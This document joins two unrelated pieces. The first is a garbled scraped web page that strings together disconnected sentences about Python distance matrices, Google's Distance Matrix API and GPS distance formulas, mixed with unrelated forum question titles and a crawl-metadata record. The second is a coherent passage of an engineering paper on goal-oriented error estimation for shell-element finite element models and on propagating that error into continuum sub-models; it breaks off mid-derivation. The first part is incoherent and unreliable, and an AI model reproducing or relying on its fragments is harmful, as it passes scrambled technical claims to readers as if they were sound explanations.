Code to retrieve information about distance matrix service from Google. I've used as my main reference however I do not know how to handle this algorithm in a 3D plot. All the data that we are interested in are now stored in the data frame. would calculate the pair-wise distances between the vectors in X using the Python function sokalsneath. This would result in sokalsneath being called (n 2) times, which is inefficient. You should have a CSV file with distances between consecutive rows. We are not trying to reinvent the wheel here. Can Law Enforcement in the US use evidence acquired through an illegal act by someone else? a, b = input().split() Type Casting. How to use Google Distance Matrix API in Python, Standard Error — A clear intuition from scratch, Analyzing the eigenvalues of a covariance matrix to identify multicollinearity, Alibaba Open-Sources Mars to Complement NumPy. Sign in. Where did all the old discussions on Google Groups actually come from? y (N, K) array_like. Read in the dataset with the longitude & latitude coordinates (X-coordinate = Latitude, Y-coordinate = Longitude). The list can be appended to the data frame as a column. Why is there no spring based energy storage? One likes to do it oneself. What happens? The calculated distance result is then appended to the empty list we created in each iteration. When working with GPS, it is sometimes helpful to calculate distances between points.But simple Euclidean distance doesn’t cut it since we have to deal with a sphere, or an oblate spheroid to be exact. I'm trying to find the closest point (Euclidean distance) from a user-inputted point to a list of 50,000 points that I have. Distance Matrix. So we have to take a look at geodesic distances.. Tikz getting jagged line when plotting polar function. Note that the first value in the list is zero. What's the fastest / most fun way to create a fork in Blender? 
scipy.sparse.coo_matrix¶ class scipy.sparse.coo_matrix (arg1, shape = None, dtype = None, copy = False) [source] ¶ A sparse matrix in COOrdinate format. Why would someone get a credit card with an annual fee? python pdb • 1.9k views It took coordinates of two locations from one of the previous sections where we performed geocoding in Python: p_1 and p_2 and parsed it through the Google Maps client from Step 1. numpy.linalg.norm(x, ord=None, axis=None, keepdims=False):-It is a function which is able to return one of eight different matrix norms, or one of an infinite number of vector norms, depending on the value of the ord parameter. (For example see : coordinate.csv) Python 3 Numpy euclidean distance matrix. Default: inv(cov(vstack([XA, XB].T))).T. Please follow the given Python program to compute Euclidean Distance. Social Media: Theories, Ethics, and Analytics. This step might take up to a minute or two depending on the amount of rows, so a little patience is required. itertools — helps to iterate through rows in the data set. You can generate a matrix of all combinations between coordinates in different vectors by setting comb parameter as True. distance = 2 ⋅ R ⋅ a r c t a n (a, 1 − a) where the latitude is φ, the longitude is denoted as λ and R corresponds to Earths mean radius in kilometers (6371). You can test this by entering the URL into your web browser (be sure to replace YOUR_API_KEY with your actual API key). Stack Overflow for Teams is a private, secure spot for you and Python provides several packages for data manipulation that are easy to use and are supported by a large community of contributors. The result is that the API will then select the nearest u-turn and calculate the long way around to the next coordinate. Create a distance matrix in Python with the Google Maps API. Returns Y ndarray. out : ndarray The output array If not None, the distance matrix Y is stored in this array. Distance Matrix API with Python. 
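The great-circle formula quoted above, distance = 2·R·arctan(a, 1 − a) with R ≈ 6371 km, is the haversine formula; the two-argument arctangent is taken of √a and √(1 − a). A direct implementation:

```python
from math import radians, sin, cos, atan2, sqrt

def haversine_km(lat1, lon1, lat2, lon2, r=6371.0):
    """Great-circle distance in km between two (lat, lon) points in degrees."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlmb / 2) ** 2
    return 2 * r * atan2(sqrt(a), sqrt(1 - a))

# One degree of latitude is roughly 111 km on a sphere of radius 6371 km.
print(round(haversine_km(0.0, 0.0, 1.0, 0.0), 1))
```

This gives the as-the-crow-flies distance, so it will generally undershoot the driving distance returned by the API.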
Principal Coordinate Analysis (PCoA) is a method similar to PCA that works from distance matrices, and so it can be used with ecologically meaningful distances like unifrac for bacteria. By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy. Returns the matrix of all pair-wise distances. I have tried to use the SciPy distance_matrix function, however it does not appear to support xyz coordinates, only x and y coordinates. Note that the list of points changes all the time. Calculate Distance Between GPS Points in Python 09 Mar 2018. This will make things easier to iterate through consecutive rows concurrently. threshold positive int. For this example, I reduced the data set to only include the first 20 rows: The solution that I have provided here is written in Python. In this post we will see how to find distance between two geo-coordinates using scipy and numpy vectorize methods. pandas — data analysis tool that helps us to manipulate data; used to create a data frame with columns. Matrix of N vectors in K dimensions. The coordinates of the points can now be obtained by eigenvalue decomposition: if we write M = U S U T, then the matrix X = U S (you can take the square root element by element) gives the positions of the points (each row corresponding to one point). Google Map Distance Matrix API is a service that provides travel distance and time is taken to reach a destination. skbio.math.stats.ordination.PCoA¶ class skbio.math.stats.ordination.PCoA(distance_matrix) [source] ¶. Please consider the billing structure before using the service. The easier approach is to just do np.hypot(*(points In simple terms, Euclidean distance is the shortest between the 2 points irrespective of the dimensions. The Distance Matrix API is unfortunately NOT free. Let’s assume that you have a data set with multiple rows of latitude and longitude coordinates. 
Finding the coordinates of points from distance matrix I've used as my main reference however I do not know how to handle this algorithm in a 3D plot. There are various ways to handle this calculation problem. I found that the ‘walking’ transport modes are more consistent for coordinates collected in smaller time intervals. In this post we will see how to find distance between two geo-coordinates using scipy and numpy vectorize methods." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86462563,"math_prob":0.9452808,"size":25732,"snap":"2021-21-2021-25","text_gpt3_token_len":5420,"char_repetition_ratio":0.16029228,"word_repetition_ratio":0.21908943,"special_character_ratio":0.21692833,"punctuation_ratio":0.12959614,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98045695,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-16T08:14:29Z\",\"WARC-Record-ID\":\"<urn:uuid:4325f9d7-d456-4c58-a67b-e83a10dbbf81>\",\"Content-Length\":\"47083\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:614404df-a039-4012-98de-bb661936c7d1>\",\"WARC-Concurrent-To\":\"<urn:uuid:c16cba5a-9de6-4a9a-9050-f46ea59dce66>\",\"WARC-IP-Address\":\"160.153.137.40\",\"WARC-Target-URI\":\"http://eimearbyrnedance.com/b9hkctpt/0101df-ethiopian-airlines-boeing-787-8-seat-map\",\"WARC-Payload-Digest\":\"sha1:MWXPK4W4Q33WPXF4UBB7S44I2RPLYJHQ\",\"WARC-Block-Digest\":\"sha1:SZBCO2D4DVK2EAKZYSGQ4REWWBNWRYH4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622234.42_warc_CC-MAIN-20210616063154-20210616093154-00249.warc.gz\"}"}
https://amses-journal.springeropen.com/articles/10.1186/s40323-021-00189-2
# Goal oriented error estimation in multi-scale shell element finite element problems

## Abstract

A major challenge with modern aircraft design is the occurrence of structural features of varied length scales. Structural stiffness can be accurately represented using homogenisation, however aspects such as the onset of failure may require information on a more refined length scale for both metallic and composite components. This work considers the errors encountered in the coarse global models due to the mesh size and how these are propagated into detailed local sub-models. The error is calculated by a goal oriented error estimator, formulated by solving dual problems and Zienkiewicz-Zhu smooth field recovery. Specifically, the novel concept of this work is applying the goal oriented error estimator to shell elements and propagating this error field into the continuum sub-model. This methodology is tested on a simplified aluminium beam section with four different local feature designs, thereby illustrating the sensitivity to various local features with a common global setting. The simulations show that when the feature models only contained holes on the flange section, there was little sensitivity of the von Mises stress to the design modifications. However, when holes were added to the webbing section, there were large stress concentrations that predicted yielding. Despite this increase in nominal stress, the maximum error does not significantly change. However, the error field does change near the holes. A Monte Carlo simulation utilising marginal distributions is performed to show the robustness of the multi-scale analysis to uncertainty in the global error estimation as would be expected in experimental measurements.
This shows a trade-off between Saint-Venant’s principle of the applied loading and stress concentrations on the feature model when investigating the response variance.

## Introduction

An understanding and evaluation of error magnitudes and bounds is vitally important in almost any engineering problem. It is not possible to assign a quantifiable level of confidence against model predictions without this information, resulting in conservatism and waste. The present work is concerned with practical error approximation in industry-relevant analysis problems. Before discussing the particulars of the present work, it is important to recognise the different types of error and analysis types.

Approximation error is concerned with evaluating the inaccuracies which are inherent to the discretization methods that are required in order to approximate the solutions to mathematical models. Modelling error, on the other hand, is concerned with how well an abstract model approximates physical phenomena in the real world. Estimates of approximation error may be termed a priori estimates or a posteriori estimates. The former utilises the problem definition and the discretization to estimate error, whereas the latter uses the approximate solution itself to estimate error. A distinction should also be made between the approximation of error bounds and the estimation of error itself. The former can be guaranteed but may well be inaccurate (error bounds may be large, for example), whereas the latter can, in general, not be guaranteed but will be constrained. As highlighted by Grätsch and Bathe, error estimates should possess several properties. Clearly, error estimates should be accurate (i.e. predicted error is comparable to the actual, true error). A good error estimate should also: asymptotically tend to zero as the mesh density increases (i.e. 
as the approximate solution approaches reality), produce tight bounds for the error, be computationally simple and inexpensive, be robust enough to be applicable in a wide range of foreseeable (potentially non-linear) applications, and inform mesh refinements such that approximate solution processes can be optimised. Grätsch and Bathe acknowledge that, at present, no one estimator can satisfy all of these requirements.

Considering the preliminary definitions, the focus of this work can be outlined. This work is concerned with the application of “goal orientated” a posteriori error estimates of approximation error. More specifically, goal orientated error estimates (GOEEs) are determined for coarse mesh approximations of a system using shell element formulations. Errors in translational and rotational degrees of freedom (DoFs) at the shell mid-plane are then propagated to continuum element realisations of the detailed sub-regions. A challenge that the aerospace industry is currently facing is performing accurate simulations of modern designs (particularly for quantities such as failure detection) and quantifying the sensitivity of simulation predictions in order to avoid overly conservative assumptions afterwards, such as large factors of safety. One of the main reasons for this challenge is that the structural components within the design are based on a variety of length scales. Design features such as fillets, laminate layers, small holes for instrumentation, and others would typically require the use of hyper-refined models that are infeasible for a realistic system. System level computations, like stiffness, can be accurately calculated via homogenisation. However, several desired computations, like the onset of failure, require explicit information of the design features on the varied length scale. 
Multi-scale analysis accounts for the multiple structural length scales, wherein DoF values are passed from the coarse global model to a localised detailed representation. The present work considers a common response to this challenge, wherein large global structures/assemblies are modelled using shell elements (approximating stiffness and allowing for the estimation of translation and rotation DoFs) and finer detailed regions are modelled using continuum elements (these models are driven by DoF results from the coarse shell model and are implemented to estimate local stresses and strains). This type of scale/realisation bridging is commonplace in industry and practical stress analysis but has not been extensively explored in the literature, at least in relation to error estimation. One of the major issues with using a multi-scale modelling technique is the confidence in the use of multiple meshes and mesh sizes due to the difference in scale. However, in most cases, the large global model mesh refinement is limited due to the computational effort to perform the required simulations on these large models. This inflexibility of the global mesh leads to the confidence issue that this work addresses with both the classification of global meshing error and how this error propagates into the multi-scale simulation’s failure analysis. The present work utilises GOEE in shell element global models and propagates uncertainty in driving DoFs to continuum element sub-models, such that uncertainty in stress/strain quantities (and any other dependent terms) can be evaluated using standard Monte-Carlo sampling approaches.

The approximation of errors in elliptic partial differential equations (PDEs) has received a good deal of attention in the literature [4,5,6]. This is encouraging for the stress analyst, as the equations that govern linear elasticity (both the displacement based Navier-Lamé formulation and the stress based Beltrami-Mitchell formulation) take elliptic forms. 
In many cases, error measures are utilised to drive mesh refinement through, for example, polytree decomposition algorithms [5, 7,8,9,10]. It is worth noting here the wide range of problems and discretization approaches that have been considered in the error estimation literature. In addition to “conventional” finite element analysis (FEA), error estimates have been derived for boundary element methods [8, 9, 11], immersed surface methods, multi-grid and composite FEA methods [7, 13, 14], extended finite elements (XFEM), and stress singularity problems. The work of Larson and Runesson deserves particular note here as it is concerned with error estimation in multiscale problems. Importantly, “seamless” scale bridging was achieved through the development of a single error estimator on the macro scale that drives mesh refinement at all scales. Numerous reviews of a priori and a posteriori error estimators are available in the literature [2, 3]. In most cases, error estimators are categorised as energy norm based (including element residual and subdomain residual methods) or recovery based estimators. The latter includes the well-known Babuška and Rheinboldt estimator, the Kelly, Gage, Zienkiewicz and Babuška estimator, and the Zienkiewicz-Zhu patch recovery technique. In the present work GOEEs are utilised, rather than providing a general indication of approximation error, as they allow for the quantification of error in a specific quantity of interest (QoI) [1, 3]. GOEE can be traced back to the 1990s through the work of Prudhomme, Oden, and Ainsworth [1, 2, 17], Ladevèze, and Bathe. In the interest of clarity, readers should note that QoIs in the present work are DoFs (translational and rotational) in shell element models. 
If meaningful error estimates of these can be derived, it is straightforward to sample from the resulting distributions and propagate uncertainties to continuum element sub-models.

Multi-scale modelling methods are a group of powerful techniques that can answer vitally important questions in many engineering sectors, particularly aerospace. Fundamentally, the multi-scale methods allow for many length and time scales to be incorporated in solving material/structural analysis problems, reducing the computational costs associated with a traditional refined simulation method [19, 20]. An example of this is relating microscopic behaviour in crystal plasticity to the macroscopic response of full-sized engineering structures. Multi-scale methods can, in a sense, be viewed as a set of approaches which homogenise the heterogeneity observed in all materials at some length scale. These can equally be applied to metallic materials as to composite materials, both of which are ubiquitous in aerospace structures. It is well known that the importance of retaining the local features depends on a variety of factors, such as the relationship between micro and macro structures, domain of interest, and the behaviour of interest. Multi-scale methods allow for the efficient introduction of additional information required to describe these effects and solve related problems. Multi-scale modelling techniques have been applied to a wide variety of fields, including aerospace [21,22,23], marine, and civil.

Many different multi-scale methods can be found in the literature and several characterisation schemes have been proposed. Weinan considers two different categorization types for multi-scale problems: Type A in which there are local defects, singularities etc. 
that require a local micro-scale model in an otherwise coarser global model, and Type B problems which have micro-scale features throughout, and require fine-scale modelling everywhere, for instance within some form of computational homogenisation. Other authors, such as Geers in, have classified these same categories but under different names. In, Type A methods are called Hierarchical methods while Type B methods are called Concurrent methods. There is inevitably some overlap between the techniques applicable to Type A and Type B problems, for example Kim and Swan used adaptive refinement of voxel meshes of representative volume elements within their numerical homogenisation approaches.

Type A problems are typically solved using mature, classical multi-scale modelling approaches such as sub-modelling, domain decomposition [29, 30] and local mesh refinement including adaptive mesh refinement. Of particular note here are the procedures used within the CleanSky2 project MARQUESS, wherein a pre-computed database of solutions enables a single sub-model to be applied to multiple instances of a recurring feature on a global finite element model of a composite component. Type A methods are the primary focus of the present work. A posteriori error estimates have been applied to Type A problems in the work of Tirvaudey et al., wherein a weighted residual based goal orientated estimate is applied in non-intrusive sub-modelling problems. Error contributions due to model, discretization, and convergence sources were evaluated.

An example of a Type B problem is the multi-scale modelling of complex fibre architectures, such as 3D woven textile composites. Many techniques can be identified for tackling this type of problem. Computational homogenisation, for example, attempts to determine equivalent properties via representative volume elements within a periodic displacement field. 
The Finite Element Squared (FE2) approach, on the other hand, utilises a fine mesh discretization linked to the Gauss points of a coarser mesh. The multi-scale finite element method (MsFEM) uses a fine mesh substructure to replace each element in the global model [20, 33]. Examples from the recent literature include Liang et al.’s use of voxel models (generated using the well-known TexGen software) to analyse woven textile composites with each element being assigned to a particular material component. Shi et al. use a three-scale model involving representative volume elements at the micro and meso-scales to model the fracture of braided composites. Liu et al. use a variant of a voxel Finite Element (FE) mesh termed the inhomogeneous FE mesh to model a woven textile composite, with the material varying from integration point to integration point rather than with material boundaries being assumed to follow the mesh. A posteriori error estimates for MsFEM problems have been developed in the work of Chung and Chamoin [37, 38].

While there are many methods to perform this multi-scale modelling, a method widely used in industry utilizes pre-computed sub-models and is particularly well suited to simulating local features, such as the ones of interest in this work. Specifically, this method utilizes a bottom-up and top-down approach to identify local failure locations [39,40,41]. The methodology is particularly useful, especially for this study, due to the superposition principle used in the sub-modelling procedure. This typically takes the displacement from the global model and converts it into the stress field of the sub-model that can be converted into a specified failure criterion.

Error in this multi-scale formulation is non-obvious, and many researchers have studied how to quantify and propagate it. 
For this work, the study of error focuses on a Goal Oriented Error Estimator (GOEE) approach in order to represent the uncertainty in a physically relevant quantity that can be propagated into an error on a failure criterion [42,43,44,45]. This failure criterion is mainly used to identify areas of high interest in the refined sub-models, a process called hot-spot identification. These areas are used to give a higher resolution of high-importance sub-areas in the model (such as fillets, small holes, or multi-layered materials).

The work presented in this paper introduces a novel use of GOEE into this multi-scale methodology using shell element formulations. While the use of shell elements is exceedingly common in the aerospace industry for large designs, this application of multi-scale propagation of a GOEE field is novel. The chosen GOEE approach targets the error associated with the mesh on the coarse global model, with a focus on the spatial distribution of errors. Specifically, this approach propagates the error field into the refined sub-model and determines the effect of this error on the failure criterion (such as von Mises stress). The novelty of this work is in the use of an error field as opposed to single-point measurements and the multi-scale propagation of the error. Previous work in this methodology presented in focuses on the calculation of the GOEE spatial distribution. This work expands this calculation into a multi-scale analysis for isotropic, metallic materials. The methodology is expected to be valid for more complex materials, such as composite materials, commonly used in the aerospace industry.

## GOEE methodology

The work presented in this paper uses a GOEE approach that utilizes a dual formulation, the Zienkiewicz-Zhu (ZZ) smoothing recovery for the strain, and a GOEE definition that incorporates these methods, expanding the work in. This GOEE estimates the error due to the mesh in the global system. 
The other aspect of this paper focuses on multi-scale propagation of this GOEE field into a refined local feature, discussed in further detail in “Application to multi-scale GOEE propagation” Section. To better illustrate this GOEE approach and multi-scale propagation, a general workflow is presented in Fig. 1. This illustrates how some methods are used multiple times, such as the ZZ recovery. As a note of nomenclature, the use of the term “primal solution” refers to a traditional FE evaluation utilizing the coarse global mesh with applied Boundary Conditions (BCs) and forces resulting in the nodal displacements. This section is split into three subsections that describe the main formulations used in this work, which are further referenced in Fig. 1. In “Global GOEE approach” Section, the definition of the dual formulation, how it is calculated, the ZZ recovery, and the GOEE formulations are expressed. “Custom element formulation” Section explains the custom shell elements used in this work to mimic the ABAQUS S4 shell element using Python, but with the ability to output the required quantities used in the dual formulation. Finally, “Specifics for using the GOEE” Section describes how this specific implementation makes adjustments to the original definition of this methodology due to the multi-scale nature and the material used in the test system.

### Global GOEE approach

The first method used in the GOEE approach utilized in this work is the introduction of a dual formulation to characterize a Quantity of Interest (QoI) such as stress at a location. Utilizing this formulation requires an additional FE evaluation to calculate the QoI that is used to estimate the error [46, 47]. The first evaluation is the standard primal formulation. This is a traditional FE evaluation with applied forces resulting in nodal displacements. 
The system considered in this work is static, so only the stiffness matrix is required for these calculations, but this methodology is not limited to static simulations. Additional information (in addition to the stiffness matrix and displacement) from the primal solution is required to formulate the GOEE estimate and is discussed later in this section. For any given system, only one primal solution is required. In the current implementation, the stiffness matrix from the primal solution is also used in the dual equations of motion to eliminate the need to regenerate the system multiple times, thus reducing the computational time.

The dual formulation, used in quantifying the error, is heavily dependent on the selection of the QoI. This formulation requires the generalized displacement due to a generalized forcing vector. For a static system, this can be expressed as:

\begin{aligned} \left[ K\right] \left\{ Z_i \right\} = \left\{ Q_i \right\} , \end{aligned}
(1)

where $$\left[ K\right]$$ is the stiffness matrix, $$\left\{ Z_i \right\}$$ is the generalized displacement corresponding to the DoF’s contribution to the ith QoI, and $$\left\{ Q_i \right\}$$ is the generalized forcing vector that depends on the QoI and location. The stiffness matrix is the same as the primal stiffness in the cases presented in this paper, while the generalized forcing vector is dependent on the type of QoI (average stress, max displacement, etc.) and the location of interest.

To calculate $$\left\{ Q_i \right\}$$, the QoI must be written in the FE setting as:

\begin{aligned} QoI_i = \left\{ Q_i \right\} ^T \left\{ u \right\} , \end{aligned}
(2)

where $$\left\{ u \right\}$$ is the displacement field from the primal solution. In this work, the average displacement in a region is considered due to its utilization in the multi-scale propagation workflow. As an example, the average displacement in the y-direction, Eq. 
2 is expressed as:

\begin{aligned} \bar{u_y}=\left\{ Q_{u_y} \right\} ^T \left\{ u \right\} , \end{aligned}
(3)

where the value of the Q vector is calculated as:

\begin{aligned} \left\{ Q_{u_y} \right\} =\frac{1}{|\Omega _{0i}|}\int _{\Omega _{0i}} N_y \left[ {\hat{i}}\right] \; d\Omega _{0i}, \end{aligned}
(4)

with $$N_y$$ being a matrix of the y-component of the $$C^0$$ elemental shape functions, $$\left[ {\hat{i}}\right]$$ being a pointer matrix that identifies the DoFs associated with the location within the integration (this is 24 by the number of DoFs, where each row is composed of zeros with a single unity entry), and $$\Omega _{0i}$$ being the total domain considered. This integration is typically decomposed by the element boundaries since both $$N_y$$ and $$\left[ {\hat{i}}\right]$$ are dependent on which element is being evaluated.

This formulation is useful if a specific region is desired. For this work, average QoI measurements are of interest due to the multi-scale propagation. Taking the displacement at a specific point would require information at an exact location, which can introduce errors associated with interpolation. To eliminate this issue, a sharp Gaussian distribution is applied, centered at the location of interest. As a result, with the addition of Gauss quadrature integration, the Q vector in Eq. 4 is approximated via:

\begin{aligned} \left\{ Q_{u_y} \right\} \approx \frac{1}{\Omega _{0i}}\sum _k^{N_{int}} N_y \left[ {\hat{i}}\right] _k |J_k| W_k \hat{W_k}, \end{aligned}
(5)

where k is the Gauss quadrature location with a total of $$N_{int}$$ in the domain, $$|J_k|$$ is the determinant of the Jacobian matrix, $$W_k$$ is the Gauss quadrature weight for the integration point, and $$\hat{W_k}$$ is a spatial distribution weight (via the narrow Gaussian). 
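As a concrete illustration, the quadrature sum of Eq. 5 can be sketched in NumPy. This is a minimal sketch, not the paper's implementation; the function and argument names are illustrative, and the narrow Gaussian spatial weight is normalised to sum to one:

```python
import numpy as np

def assemble_Q(gp_xy, gp_N, gp_dofs, detJ, wts, x_target, length=0.1):
    """Sketch of Eq. 5: assemble the generalized forcing vector {Q} for an
    average y-displacement QoI by Gauss quadrature with a narrow Gaussian
    spatial weight centred at x_target (all names are illustrative).

    gp_xy   : (n_gp, 2) integration point coordinates
    gp_N    : (n_gp, 4) bilinear shape functions evaluated at each point
    gp_dofs : (n_gp, 4) global DoF indices of the u_y entries (pointer matrix)
    detJ    : (n_gp,)   Jacobian determinants
    wts     : (n_gp,)   Gauss quadrature weights
    """
    # narrow Gaussian spatial weight W_hat, normalised so it sums to one
    w_hat = np.exp(-np.sum((gp_xy - x_target) ** 2, axis=1) / (2.0 * length ** 2))
    w_hat /= w_hat.sum()

    Q = np.zeros(gp_dofs.max() + 1)
    for k in range(len(wts)):
        # scatter N_y * |J_k| * W_k * W_hat_k into the global DoFs
        Q[gp_dofs[k]] += gp_N[k] * detJ[k] * wts[k] * w_hat[k]
    return Q / np.sum(detJ * wts)  # divide by the domain measure |Omega_0i|
```

Once {Q} is assembled, the dual field of Eq. 1 follows from a single extra linear solve against the already-assembled primal stiffness, e.g. `Z = np.linalg.solve(K, Q)`.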
This formulation is used since the information from the FE (Gaussian weights, Jacobian, etc.) is known at the Gaussian integration locations. With this formulation, there is one normalization constraint of:

\begin{aligned} \sum _k^{N_{int}} \hat{W_k} = 1, \end{aligned}
(6)

due to the applied spatial weighting function.

The spatial weights ($$\hat{W_k}$$) in the analysis are based on the Euclidean distance from the target location. In this paper, these weights are based on a Gaussian distribution via:

\begin{aligned} \hat{W_k}=a \exp \left( -\frac{|x_k-x_i|^2}{2l^2}\right) , \end{aligned}
(7)

where l is a user-defined length, $$x_i$$ is the location of the centre of the distribution, $$x_k$$ is the location of the Gaussian integration point, and a is a normalization factor to ensure Eq. 6 is valid. Once the Q vector is determined for a specific QoI, the FE analysis can be recomputed in order to determine the dual solution $$\left\{ Z_i \right\}$$.

The main calculation of this GOEE approach is based on the difference between the discontinuous and smoothed strain fields. To create a smoothed field, ZZ recovery is used. ZZ recovery creates a piece-wise continuous field [48, 49] of the directional strains. For the shell element considered, the shape functions are $$\hbox {C}^0$$ continuous, such that the derivative (strain) is not continuous across element boundaries. In order to make the strain continuous, the ZZ recovery method is used to create a smooth strain field [50, 51].

To perform the ZZ recovery, the strain must be known at specific locations. For use in FE, these locations are specified as the Gauss integration locations (similar to the calculation of the stiffness matrix). Once these values are known, the ZZ recovery can be performed for the location of each node in each strain component individually. For each node, the ZZ recovery averages the known strain values at the nearby integration points. 
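A minimal sketch of this nodal averaging is given below. It assumes inverse-distance weighting of the nearest integration point in each attached element; this weighting choice, like the function and argument names, is an assumption for illustration, since the text describes the averaging only qualitatively:

```python
import numpy as np

def zz_nodal_recovery(node_xy, elems, gp_xy, gp_strain):
    """Recover a continuous nodal strain field from discontinuous
    Gauss-point strains by distance-weighted averaging (illustrative).

    node_xy  : (n_nodes, 2)        nodal coordinates
    elems    : (n_el, 4)           node indices of each quad element
    gp_xy    : (n_el, n_gp, 2)     integration point coordinates
    gp_strain: (n_el, n_gp, 3)     strain components at integration points
    """
    n_nodes = len(node_xy)
    recovered = np.zeros((n_nodes, gp_strain.shape[2]))
    for n in range(n_nodes):
        vals, wts = [], []
        for e in range(len(elems)):
            if n in elems[e]:  # element attached to this node (connectivity)
                # nearest integration point of this element to the node
                d = np.linalg.norm(gp_xy[e] - node_xy[n], axis=1)
                k = int(np.argmin(d))
                vals.append(gp_strain[e, k])
                wts.append(1.0 / max(float(d[k]), 1e-12))  # inverse distance
        recovered[n] = np.average(vals, axis=0, weights=wts)
    return recovered
```

By construction, a strain field that is constant at every integration point is recovered exactly at the nodes.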
This work utilizes the Nearest Neighbour (NN) approach, which requires information about the nodal connectivity (which nodes are in each element). The NN approach then takes the nearest integration point location for each element that the node is connected to and averages them based on distance. Note that this information is easily available in the mesh data that describes each element as a collection of nodes.

Once the nodal values of the recovered strain field are determined, a surface is applied to the system. For ease of use, the $$C^0$$ element shape functions are used as the basis functions for this surface. The equation for this surface is defined as:

\begin{aligned} \epsilon ^*(x)=\sum _e N_e(x)\left\{ \epsilon ^* \right\} _e, \end{aligned}
(8)

where $$\left\{ \epsilon ^* \right\} _e$$ contains the recovered strains at the nodes of element e, the superscript $$*$$ represents a recovered value, and $$N_e(x)$$ are the element shape functions.

Once the ZZ recovery is performed on both the primal and dual strain fields, the GOEE is calculated. This formulation of the GOEE closely follows the work in with slight differences in how the dual problem results are incorporated. The calculation is based on a modification of the energy norm. 
For the GOEE approach used in this work, the dual problems are implemented into this energy norm to be calculated as:

\begin{aligned} GOEE_i = \int _\Omega (\epsilon _u^*-\nabla u_h):C:(\epsilon _{z_i}^* - \nabla z_{hi}) d\Omega , \end{aligned}
(9)

with $$\epsilon _u^*$$ and $$\epsilon _{z_i}^*$$ being the ZZ recovered strain for the primal and dual problem respectively, $$u_h$$ is the displacement determined by the primal FE problem, $$z_{hi}$$ is the generalized displacement from the dual FE problem (in units of the force normalized QoI), $$\Omega$$ is the domain of interest, the colon ( : ) denotes the double dot product of two tensor quantities, C is the material constitutive tensor, and $$\nabla$$ is a vector operator of derivatives. In simplified terms, the difference $$(\epsilon ^*-\nabla u_h)$$ is a measure of the difference between the discontinuous strain field and the smoothed recovered strain field.

### Custom element formulation

Commercial finite element codes, such as ABAQUS , are widely used for the structural analysis of components and structures within industrial applications. However, for the purposes of this work, additional information is required to calculate the error estimator that is not returned by ABAQUS. This information is used within the element formulation (to create the stiffness matrix) but is not stored or returnable to the user. To overcome this, a custom, general purpose, iso-parametric, flat shell element has been developed for the simulation of 3D components within Python.

The custom shell element, named Q4, is used to store all the information used in the calculation. In the GOEE evaluations, values such as the strain-displacement matrices, integration point locations, and other quantities are required. For a typical ABAQUS analysis, this information is either not stored in memory or is not easily available. 
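The per-element bookkeeping this implies can be as simple as a record type; the sketch below is hypothetical (field names are illustrative, not the paper's Q4 implementation), showing the quantities listed above being retained rather than discarded after assembly:

```python
from dataclasses import dataclass, field
from typing import List
import numpy as np

@dataclass
class Q4ElementData:
    """Hypothetical minimal record of the per-element quantities the
    error estimator needs but which commercial codes discard after
    the stiffness matrix is assembled."""
    nodes: np.ndarray       # (4,) global node indices of the element
    gauss_xy: np.ndarray    # (n_gp, 2) integration point coordinates
    gauss_wts: np.ndarray   # (n_gp,) quadrature weights
    detJ: np.ndarray        # (n_gp,) Jacobian determinants
    # strain-displacement matrices per integration point
    B_bending: List[np.ndarray] = field(default_factory=list)
    B_membrane: List[np.ndarray] = field(default_factory=list)
    B_shear: List[np.ndarray] = field(default_factory=list)
```

Keeping these arrays per element is what allows the dual assembly of Eq. 5 and the ZZ recovery to be evaluated after the primal solve without re-deriving the element formulation.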
Ideally, this analysis could be performed using ABAQUS’s S4 element if all the information was stored, but due to the black-box nature of the ABAQUS element formulation, this is not possible.

The proposed degenerate continuum element formulation is implemented using the Mixed Interpolation of Tensorial Components (MITC) approach, first attributed, for quadrilateral four-node elements (MITC4), to [54, 55]. The element formulation uses a bi-linear interpolation with 4 nodes, with 2 $$\times$$ 2 Gauss points for the bending and membrane integration and a single-point contribution for shear, derived from the Reissner–Mindlin theory assuming linear material/geometric properties and small strains. The MITC4 formulation, developed to reduce shear locking, has five DoF per mid-surface node, as the rotational stiffness about the z-axis, often termed the drilling DoF, is neglected due to the thin nature of the elements. To allow for three-dimensional systems and subsequent non-planar global coordinates, the element is implemented with a sixth DoF, but it is constrained as a boundary condition. For the purpose of this paper, as the mid-surface is assumed as flat (i.e. there is no curvature to the elements and all nodes are co-planar), the shell element can essentially be classified by the superposition of plane stress, plate bending and shear stress, where the effects are assessed independently. 
The internal energy for this formulation is defined for each element by a linear geometric interpolation scheme throughout the element, expressed as:

\begin{aligned} U^{e} = \frac{1}{2} \int _{\Omega _{e}}\sigma _{b} \cdot \epsilon _{b} d\Omega _{e} + \frac{1}{2} \int _{\Omega _{e}}\sigma _{m} \cdot \epsilon _{m} d\Omega _{e} + \frac{\kappa }{2} \int _{\Omega _{e}}\sigma _{s} \cdot \epsilon _{s} d\Omega _{e}, \end{aligned}
(10)

where $$\sigma _\alpha$$ and $$\epsilon _\alpha$$ are defined for the corresponding bending, membrane and shear components $$\{\alpha \}$$ for each element domain $$\Omega _{e}$$, and $$\sigma _\alpha \cdot \epsilon _\alpha$$ is the tensor dot product of the stress and strain. The linear-elastic stress-strain relations are defined for a homogeneous isotropic material as:

\begin{aligned} \sigma _{\alpha } = C_{\alpha } \cdot \epsilon _{\alpha }, \end{aligned}
(11)

where $$\epsilon _{\alpha }$$ is the applied strain and the material matrix $$C_{\alpha }$$ is defined by the constitutive equation for plane stress/plate bending as:

\begin{aligned} C_{m}= & {} \frac{E t}{(1-\nu ^{2})} \left[ \begin{array}{ccc} 1 &{} \nu &{} 0 \\ \nu &{} 1 &{} 0 \\ 0 &{} 0 &{} \frac{1-\nu }{2} \end{array} \right] \end{aligned}
(12a)
\begin{aligned} C_{b}= & {} \left( \frac{t^{2}}{12} \right) C_{m} \end{aligned}
(12b)
